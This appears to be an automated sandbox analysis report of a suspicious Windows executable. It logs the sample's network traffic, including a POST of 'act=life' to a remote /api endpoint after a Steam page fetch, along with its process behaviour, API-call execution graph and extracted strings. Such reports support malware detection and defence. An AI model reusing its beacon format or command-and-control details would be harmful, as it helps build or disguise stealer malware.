                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://ste [TRUNCATED]
                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                      Date: Sun, 20 Oct 2024 18:14:58 GMT
                                                                                                                                                                                                      Content-Length: 34508
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Set-Cookie: sessionid=e6a0f35c3786079464e2950d; Path=/; Secure; SameSite=None
                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C0e3d185a3e106e73b244decdec33a0ea; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                      2024-10-20 18:14:58 UTC14493INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                      2024-10-20 18:14:58 UTC16384INData Raw: 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65
                                                                                                                                                                                                      Data Ascii: etY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Me


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      1192.168.2.449731104.21.53.84436372C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-20 18:14:59 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                      Host: sergei-esenin.com
                                                                                                                                                                                                      2024-10-20 18:14:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                      2024-10-20 18:14:59 UTC560INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                      Date: Sun, 20 Oct 2024 18:14:59 GMT
                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7NBve1yZenzcS24YSNAg1NZSkRWPUyTYji1ee7z3FEEY4zhZTRD5CWlyA%2F9LQVKB6eW9LFhx37SWaOAm6iIHFnMEudmJiVr%2BAMtOpWlEFn4w0xzV4C5kbz8zIc%2FyGvMplhRwTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                      CF-RAY: 8d5afd9d4b962ac0-LAX
                                                                                                                                                                                                      2024-10-20 18:14:59 UTC809INData Raw: 31 31 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                      Data Ascii: 1153<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                                      2024-10-20 18:14:59 UTC1369INData Raw: 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42
                                                                                                                                                                                                      Data Ascii: i/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementB
                                                                                                                                                                                                      2024-10-20 18:14:59 UTC1369INData Raw: 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                      Data Ascii: s-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
                                                                                                                                                                                                      2024-10-20 18:14:59 UTC896INData Raw: 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67
                                                                                                                                                                                                      Data Ascii: /span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing


                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                      Start time:14:14:53
                                                                                                                                                                                                      Start date:20/10/2024
                                                                                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                      Imagebase:0x550000
                                                                                                                                                                                                      File size:2'905'088 bytes
                                                                                                                                                                                                      MD5 hash:7A359B81462A150726F40AE4D2CA23D5
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:1.4%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:57.4%
                                                                                                                                                                                                        Total number of Nodes:61
                                                                                                                                                                                                        Total number of Limit Nodes:6
                                                                                                                                                                                                        execution_graph 20179 55edb5 20182 55edd0 20179->20182 20183 55fca0 20182->20183 20186 55fcdc 20183->20186 20184 55ef70 20186->20184 20187 593220 20186->20187 20188 5932ac 20187->20188 20189 5932a2 RtlFreeHeap 20187->20189 20190 593236 20187->20190 20188->20184 20189->20188 20190->20189 20191 5964b8 20193 5963f2 20191->20193 20192 59646e 20193->20192 20195 595bb0 LdrInitializeThunk 20193->20195 20195->20192 20196 562f94 20199 562f9e 20196->20199 20197 563377 CoUninitialize 20198 5634b3 20199->20197 20199->20198 20200 593220 RtlFreeHeap 20199->20200 20201 5634cc 20199->20201 20200->20199 20220 579510 LdrInitializeThunk 20201->20220 20203 563674 20221 579bb0 LdrInitializeThunk 20203->20221 20220->20203 20227 58f5fc CoSetProxyBlanket 20228 55d110 20229 55d119 20228->20229 20230 55d2ee ExitProcess 20229->20230 20231 55d2e9 20229->20231 20236 562f10 CoInitialize 20229->20236 20237 5956e0 FreeLibrary 20231->20237 20237->20230 20238 5999d0 20240 5999f5 20238->20240 20239 599b0e 20242 599a5f 20240->20242 20244 595bb0 LdrInitializeThunk 20240->20244 20242->20239 20245 595bb0 LdrInitializeThunk 20242->20245 20244->20242 20245->20239 20251 56049b 20255 560227 20251->20255 20252 560455 20254 595700 2 API calls 20252->20254 20256 560308 20254->20256 20255->20252 20255->20256 20257 595700 20255->20257 20258 59571b 20257->20258 20259 595797 20257->20259 20261 59578c 20257->20261 20263 595729 20257->20263 20258->20259 20258->20261 20258->20263 20260 593220 RtlFreeHeap 20259->20260 20260->20261 20261->20252 20262 595776 RtlReAllocateHeap 20262->20261 20263->20262 20264 58f54b 20265 58f598 20264->20265 20266 58f5cb SysAllocString 20264->20266 20265->20266 20267 58f5f0 20266->20267 20268 58d9cb 20271 58d9fb 20268->20271 20269 58da65 20271->20269 20272 595bb0 LdrInitializeThunk 20271->20272 20272->20271 20273 58f620 20276 58f64d 20273->20276 20274 58fa30 20275 58fade GetVolumeInformationW 20275->20274 20276->20274 20276->20275 20277 562f6f CoInitializeSecurity 20278 593202 RtlAllocateHeap

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 239 55fca0-55fcda 240 55fcdc-55fcdf 239->240 241 55fd0b-55fe22 239->241 242 55fce0-55fd09 call 562690 240->242 243 55fe24 241->243 244 55fe5b-55fe8c 241->244 242->241 248 55fe30-55fe59 call 562760 243->248 245 55feb6-55fec5 call 560b50 244->245 246 55fe8e-55fe8f 244->246 255 55feca-55fecf 245->255 249 55fe90-55feb4 call 562700 246->249 248->244 249->245 257 55fed5-55fef8 255->257 258 55ffe4-55ffe6 255->258 260 55ff2b-55ff2d 257->260 261 55fefa 257->261 259 5601b1-5601bb 258->259 263 55ff30-55ff3a 260->263 262 55ff00-55ff29 call 5627e0 261->262 262->260 264 55ff41-55ff49 263->264 265 55ff3c-55ff3f 263->265 267 5601a2-5601ad call 593220 264->267 268 55ff4f-55ff76 264->268 265->263 265->264 267->259 270 55ff78 268->270 271 55ffab-55ffb5 268->271 273 55ff80-55ffa9 call 562840 270->273 274 55ffb7-55ffbb 271->274 275 55ffeb 271->275 273->271 279 55ffc7-55ffcb 274->279 277 55ffed-55ffef 275->277 280 55fff5-56002c 277->280 281 56019a 277->281 279->281 283 55ffd1-55ffd8 279->283 284 56002e-56002f 280->284 285 56005b-560065 280->285 281->267 286 55ffde 283->286 287 55ffda-55ffdc 283->287 288 560030-560059 call 5628a0 284->288 289 560067-56006f 285->289 290 5600a4 285->290 291 55ffc0-55ffc5 286->291 292 55ffe0-55ffe2 286->292 287->286 288->285 295 560087-56008b 289->295 293 5600a6-5600a8 290->293 291->277 291->279 292->291 293->281 296 5600ae-5600c5 293->296 295->281 298 560091-560098 295->298 299 5600c7 296->299 300 5600fb-560102 296->300 301 56009e 298->301 302 56009a-56009c 298->302 303 5600d0-5600f9 call 562900 299->303 304 560104-56010d 300->304 305 560130-56013c 300->305 306 560080-560085 301->306 307 5600a0-5600a2 301->307 302->301 303->300 309 560117-56011b 304->309 310 5601c2-5601c7 305->310 306->293 306->295 307->306 309->281 312 56011d-560124 309->312 310->267 313 560126-560128 312->313 314 56012a 312->314 313->314 315 560110-560115 314->315 316 56012c-56012e 314->316 315->309 317 560141-560143 315->317 316->315 317->281 318 560145-56015b 317->318 318->310 319 56015d-56015f 318->319 320 560163-560166 319->320 321 5601bc 320->321 322 560168-560188 call 562030 320->322 321->310 325 560192-560198 322->325 326 56018a-560190 322->326 325->310 326->320 326->325
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: J|BJ$V$VY^_$ek29QrYh_BrBdY6dMY92u8XuaeDJV.hg2ExBLaaPlIA-1729448099-0.0.1.1-/api$t
                                                                                                                                                                                                        • API String ID: 0-3236621253
                                                                                                                                                                                                        • Opcode ID: 94e99bb879a99953c4626b04c74b84ddea546b4fe90764c9e2e863e955119bfd
                                                                                                                                                                                                        • Instruction ID: 49031d9f418afbc9ab14564198c81c9632c3c32d88c611b57d328dd293dac75d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94e99bb879a99953c4626b04c74b84ddea546b4fe90764c9e2e863e955119bfd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32D1657450C3809BD711DF14989462FBFE1BB96B45F58882DF8C98B292C336CD49DB92

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 327 58f620-58f64b 328 58f67b-58f70b 327->328 329 58f64d-58f64f 327->329 333 58f73b-58f76e 328->333 334 58f70d-58f70f 328->334 330 58f650-58f679 call 592f70 329->330 330->328 341 58fa98-58faa2 333->341 342 58fa30 333->342 343 58f9d0-58fa0a 333->343 344 58fa90 333->344 345 58fab0-58fab6 333->345 346 58fa11-58fa1a 333->346 347 58fa92 333->347 348 58f775-58f791 333->348 349 58f7b6-58f80c 333->349 350 58fa36 333->350 351 58fa4c-58fa5d 333->351 352 58fa6f-58fa8b 333->352 353 58fa40-58fa49 call 55caa0 333->353 354 58fac0 333->354 355 58fa61-58fa6b 333->355 356 58f867-58f88a 333->356 336 58f710-58f739 call 592fc0 334->336 336->333 341->345 343->341 343->342 343->344 343->345 343->346 343->347 343->350 343->351 343->353 343->354 357 58fbfe-58fc0b 343->357 358 58faff-58fb06 343->358 359 58fb30 343->359 360 58fbd0-58fbdd 343->360 361 58fb51-58fb60 343->361 362 58fb32-58fb3a 343->362 363 58fb6a-58fb94 call 5864f0 343->363 364 58fbed-58fbfa 343->364 365 58fb41-58fb4a 343->365 366 58fbe4-58fbe8 343->366 367 58fac6-58faf8 call 598a80 GetVolumeInformationW 343->367 368 58fb07-58fb17 343->368 369 58fb67 343->369 379 58faba 345->379 346->341 346->342 346->343 346->344 346->345 346->346 346->347 346->350 346->351 346->353 346->354 346->357 346->358 346->359 346->360 346->361 346->362 346->363 346->364 346->365 346->366 346->367 346->368 346->369 380 58f795-58f7af 348->380 389 58f83b-58f849 349->389 390 58f80e-58f80f 349->390 350->353 351->355 352->344 353->351 355->352 383 58f8c8 356->383 384 58f88c-58f890 356->384 401 58fc0f 357->401 360->360 360->366 361->360 361->363 361->366 361->369 362->358 362->360 362->361 362->363 362->365 362->366 362->369 393 58fba0-58fba8 363->393 364->357 365->360 365->361 365->363 365->366 365->369 371 58fb20-58fb25 366->371 367->358 367->359 367->360 367->361 367->362 367->363 367->365 367->366 367->368 367->369 368->371 369->363 371->359 379->354 380->341 380->342 380->343 380->344 380->345 380->346 380->347 380->349 380->350 380->351 380->353 380->354 380->355 380->356 394 58f8ca-58f8e4 call 55ca90 383->394 392 58f8a0-58f8a4 384->392 397 58f84d-58f860 389->397 391 58f810-58f839 call 593050 390->391 391->389 392->394 398 58f8a6-58f8c2 392->398 393->393 399 58fbaa-58fbc0 393->399 406 58f9b9-58f9c6 394->406 407 58f8ea-58f8f3 394->407 397->341 397->342 397->343 397->344 397->345 397->346 397->347 397->350 397->351 397->353 397->354 397->356 397->357 397->358 397->359 397->360 397->361 397->362 397->363 397->364 397->365 397->366 397->367 397->368 397->369 403 58f892-58f89e 398->403 404 58f8c4-58f8c6 398->404 399->360 399->366 401->401 403->392 403->394 404->403 406->341 406->342 406->343 406->344 406->345 406->346 406->347 406->350 406->351 406->353 406->354 406->357 406->358 406->359 406->360 406->361 406->362 406->363 406->364 406->365 406->366 406->367 406->368 406->369 407->406 408 58f8f9-58f908 407->408 409 58f90b-58f912 408->409 409->406 410 58f918-58f91c 409->410 411 58f91e-58f925 410->411 412 58f927-58f939 410->412 413 58f9a2-58f9a8 411->413 414 58f93b-58f941 412->414 415 58f961-58f971 412->415 413->406 418 58f9aa-58f9b3 413->418 414->415 416 58f943-58f95f 414->416 415->413 417 58f973-58f99d 415->417 416->413 417->413 418->406 418->409
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
